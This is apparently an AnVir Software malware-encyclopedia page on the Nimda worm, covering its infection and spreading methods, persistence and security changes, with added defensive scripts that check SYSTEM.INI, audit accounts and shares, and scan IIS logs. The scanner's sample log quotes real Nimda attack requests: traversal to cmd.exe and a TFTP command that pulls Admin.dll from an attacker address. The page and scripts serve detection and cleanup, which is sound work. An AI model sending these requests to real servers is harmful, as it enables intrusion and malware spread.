AnVir Software

Virus Nimda


Nimda is an Internet mass-mailing worm that uses several methods to spread and that also infects executable files. Its name is "admin" spelled backwards.

It arrives by email as an attachment named README.EXE. The recipient does not have to open the attachment for it to run: the worm relies on a known flaw in Internet Explorer-based email clients (the incorrect MIME header vulnerability, MS01-020) that causes the attachment to execute automatically when the message is viewed. When it executes from email, it drops executable copies of itself into the temp folder and runs them to carry out its infection routines.

It spreads in several ways: by email, through open network shares, by attacking unpatched IIS web servers, through the web pages those servers serve to visitors, and by infecting executable files on the local machine.

It infects executable files by prepending its own code to them. When an infected file is run, the worm code executes first, then extracts and runs the original host program so that the user notices nothing.

It also copies itself to LOAD.EXE and to RICHED20.DLL in the Windows System folder and sets the Hidden and System attributes on both files. The dropped RICHED20.DLL overwrites the legitimate RICHED20.DLL (the rich text edit control used to view document files), so that any application loading that library runs the worm. After cleaning, RICHED20.DLL should be restored from the original OS installation media.

On Windows NT/2000 systems it also copies itself to MMC.EXE in the Windows folder, overwriting the Microsoft Management Console program, and copies itself into the Startup folder so that it runs at logon.

The dropped EXE files have the Hidden attribute set and use the default icon of HTML files, so that infected users do not easily notice the worm.

The worm also writes copies of itself as .eml and .nws (email and news message) files and copies them to any open network shares it can reach.

To run at startup on Windows 9x/ME, it modifies the Shell key in the [boot] section of SYSTEM.INI so that the worm is launched alongside Explorer:
Shell = explorer.exe load.exe -dontrunold
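The SYSTEM.INI change above is a simple persistence indicator to check for. The following script is an added example, not code from AnVir or from the original page: it parses the [boot] section the way Windows does (section and key names case-insensitive), lists every program the Shell= line launches besides the shell itself, and flags the load.exe entry and -dontrunold switch quoted above. The two sample INI texts are constructed, not taken from a real machine.

```python
import re

# Constructed sample inputs: a clean Windows 9x SYSTEM.INI and the same file after
# the Shell= change quoted on this page.
CLEAN_INI = "[boot]\nshell=Explorer.exe\ndrivers=mmsystem.dll\n\n[386Enh]\n"
INFECTED_INI = "[boot]\nShell = explorer.exe load.exe -dontrunold\n\n[386Enh]\n"

EXECUTABLE_EXT = (".exe", ".com", ".bat", ".pif", ".scr")


def boot_shell_value(ini_text):
    """Return the value of the Shell= key in the [boot] section, or None if absent.
    Section and key names are matched case-insensitively, as Windows does."""
    section = None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            section = m.group(1).strip().lower()
            continue
        if section == "boot" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "shell":
                return value.strip()
    return None


def extra_shell_programs(ini_text):
    """Programs that Shell= launches besides the shell itself. The first token is the
    shell (normally Explorer.exe); on a clean system nothing else is listed."""
    value = boot_shell_value(ini_text)
    if value is None:
        return []
    return [t for t in value.split()[1:] if t.lower().endswith(EXECUTABLE_EXT)]


def nimda_shell_indicator(ini_text):
    """True when Shell= launches load.exe (the hidden copy Nimda drops in the System
    folder) or carries the worm's -dontrunold switch."""
    value = (boot_shell_value(ini_text) or "").lower()
    extras = [p.lower() for p in extra_shell_programs(ini_text)]
    return "-dontrunold" in value or any(p.split("\\")[-1] == "load.exe" for p in extras)


if __name__ == "__main__":
    for name, ini in (("clean", CLEAN_INI), ("infected", INFECTED_INI)):
        print(name, boot_shell_value(ini), extra_shell_programs(ini), nimda_shell_indicator(ini))
```

On a real system, read C:\WINDOWS\SYSTEM.INI into `ini_text`; any extra program reported by `extra_shell_programs` deserves a look even if it is not load.exe, since the same key was abused by other malware of the period.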

On Windows NT it injects itself into the running EXPLORER process, and on Windows 9x it registers itself as a service process so that it does not appear in the task list; both techniques are meant to hide it from the user.

Besides spreading over the network, it changes system settings in ways that weaken network security and leave the infected system more exposed to later Trojan attacks.

The worm opens network shares on the infected computer, allowing remote access to the system. It enables the Guest account and adds it to the Administrators group, shares the C:\ folder as C$, and shares all fixed drives C through Z in the same way.
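The account and share changes just described are easy to audit. The following function is an added example, not code from AnVir or from the original page; it assumes a current Windows host (Windows 8 / Server 2012 or later, where Get-LocalUser, Get-LocalGroupMember and Get-SmbShare exist) and an elevated session. It reports an enabled Guest account, Guest membership in Administrators, and any share that exposes a drive root but is not one of the operating system's own administrative shares.

```powershell
# Added example (not from the AnVir page): review the account and share changes
# described above. Assumes Windows 8 / Server 2012 or later and an elevated session.
function Get-NimdaShareFindings {
    $findings = @()

    # Nimda enables Guest and puts it in Administrators; report either condition.
    $guest = Get-LocalUser -Name 'Guest' -ErrorAction SilentlyContinue
    if ($guest -and $guest.Enabled) {
        $findings += 'Guest account is enabled'
    }
    $admins = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue
    if ($admins | Where-Object { $_.Name -like '*\Guest' }) {
        $findings += 'Guest is a member of Administrators'
    }

    # Nimda shares every fixed drive root as <letter>$. On NT-family systems those names
    # already exist as built-in administrative shares (Special = True), so only report
    # shares that point at a drive root and were not created by the OS itself.
    Get-SmbShare -ErrorAction SilentlyContinue |
        Where-Object { -not $_.Special -and $_.Path -match '^[A-Za-z]:\\?$' } |
        ForEach-Object {
            $findings += "Non-default share '$($_.Name)' exposes drive root $($_.Path)"
        }

    return $findings
}

$result = Get-NimdaShareFindings
if ($result) {
    $result | ForEach-Object { Write-Warning $_ }
} else {
    'No Nimda-style account or share changes found.'
}
```

On a Windows 9x machine, where none of these cmdlets exist, the equivalent manual check is `net share` for drive-root shares; 9x has no local Administrators group, so the Guest change applies to NT-family systems only.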

Against web servers, the worm uses known IIS weaknesses to run commands on the target: the directory traversal ("Unicode") vulnerability in IIS 4.0 and 5.0, and the root.exe backdoor left behind on servers previously compromised by Code Red II. Once it can execute cmd.exe on the server, it transfers a copy of itself (as Admin.dll) to the server with TFTP and runs it. Any machine running a vulnerable IIS that is reachable from an infected host can receive these requests.

After infecting an unpatched Microsoft IIS web server, Nimda appends a small JavaScript fragment to the server's web pages that opens a README.EML file in a hidden browser window. A visitor to the compromised site is then prompted to download, or automatically loads, this .eml (Outlook Express) message file, which carries the worm as an attachment. Disabling "File Download" in the Internet Explorer security zone settings prevents this form of compromise.
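The IIS attack requests described above leave a recognisable trail in web server logs, and most of them rely on encoding tricks (double percent-encoding, overlong UTF-8 sequences) that defeat a naive string match. The script below is an added example, not code from AnVir or from the original page: it decodes request paths the lenient way IIS of that era did, then flags traversal to cmd.exe, probes for the root.exe backdoor and the TFTP fetch of Admin.dll. The log excerpt is constructed in W3C extended format with an assumed field order (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status); the request strings are the Nimda probes listed in CERT Advisory CA-2001-26, and the addresses are from a documentation range.

```python
import re
import string

HEX = set(string.hexdigits)

# Constructed W3C-extended IIS log excerpt (not a real capture). Field order assumed:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status. IIS logs the part after
# "?" as cs-uri-query and writes "-" for an empty field.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 13:05:17 192.0.2.10 GET /default.htm - 200
2001-09-18 13:05:19 192.0.2.77 GET /scripts/root.exe /c+dir 404
2001-09-18 13:05:19 192.0.2.77 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:05:19 192.0.2.77 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404
2001-09-18 13:05:20 192.0.2.77 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+tftp%20-i%20192.0.2.77%20GET%20Admin.dll 200
2001-09-18 13:05:22 192.0.2.10 GET /images/logo.gif - 200
"""


def percent_decode(s):
    """One pass of %XX decoding, returning raw bytes; malformed escapes are kept literally."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s[i] == "%" and i + 2 < len(s) and s[i + 1] in HEX and s[i + 2] in HEX:
            out.append(int(s[i + 1:i + 3], 16))
            i += 3
        else:
            out.extend(s[i].encode("latin-1", errors="replace"))
            i += 1
    return bytes(out)


def lax_utf8(b):
    """IIS-style lenient UTF-8: any 0xC0-0xDF lead byte plus the next byte is taken as a
    two-byte sequence, even when that byte is not a valid continuation (0xC1 0x1C) or the
    pair is an overlong form of an ASCII character (%c0%af -> '/', %c1%9c -> '\\')."""
    out = []
    i = 0
    while i < len(b):
        if 0xC0 <= b[i] <= 0xDF and i + 1 < len(b):
            out.append(chr(((b[i] & 0x1F) << 6) | (b[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b[i]))
            i += 1
    return "".join(out)


def normalize_path(path):
    """Decode twice (the second pass catches double encoding such as %255c), then fold
    backslashes to slashes and lower-case, so all traversal variants compare equal."""
    s = path
    for _ in range(2):
        s = lax_utf8(percent_decode(s))
    return s.replace("\\", "/").lower()


def classify_request(method, uri_stem, uri_query):
    """Return the list of Nimda indicators matched by one request (empty if none)."""
    path = normalize_path(uri_stem)
    query = normalize_path("" if uri_query == "-" else uri_query)
    hits = []
    if path.endswith("/root.exe"):
        hits.append("root.exe backdoor probe")           # Code Red II left root.exe in /scripts and /msadc
    if path.endswith("/cmd.exe") and "../" in path:
        hits.append("directory traversal to cmd.exe")    # the IIS Unicode/double-decode bug
    if re.fullmatch(r"/[a-z]/winnt/system32/cmd\.exe", path):
        hits.append("cmd.exe via drive-letter virtual directory")  # /c and /d left by Code Red II
    if "tftp" in query and "admin.dll" in query:
        hits.append("tftp fetch of admin.dll")           # worm copying itself onto the server
    return hits


def parse_w3c_line(line):
    """Split one log line into the assumed fields; returns None for headers/short lines."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 7:
        return None
    date, time, c_ip, method, stem, query, status = parts[:7]
    return {"ip": c_ip, "method": method, "stem": stem, "query": query, "status": status}


def scan_log(lines):
    """Return (client ip, uri stem, indicators) for every request matching a Nimda indicator."""
    results = []
    for line in lines:
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        hits = classify_request(rec["method"], rec["stem"], rec["query"])
        if hits:
            results.append((rec["ip"], rec["stem"], hits))
    return results


if __name__ == "__main__":
    for ip, stem, hits in scan_log(SAMPLE_LOG.splitlines()):
        print(ip, stem, "->", "; ".join(hits))
```

A 404 against these paths means the server was probed but did not serve the file; a 200 on a traversal to cmd.exe, or on the TFTP request, means the command ran and the host should be treated as compromised. Because the decoder folds every encoding variant to the same normalized path, new obfuscations of the same traversal are caught without adding signatures.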

© Copyright 2000-2008 AnVir Software. All Rights Reserved.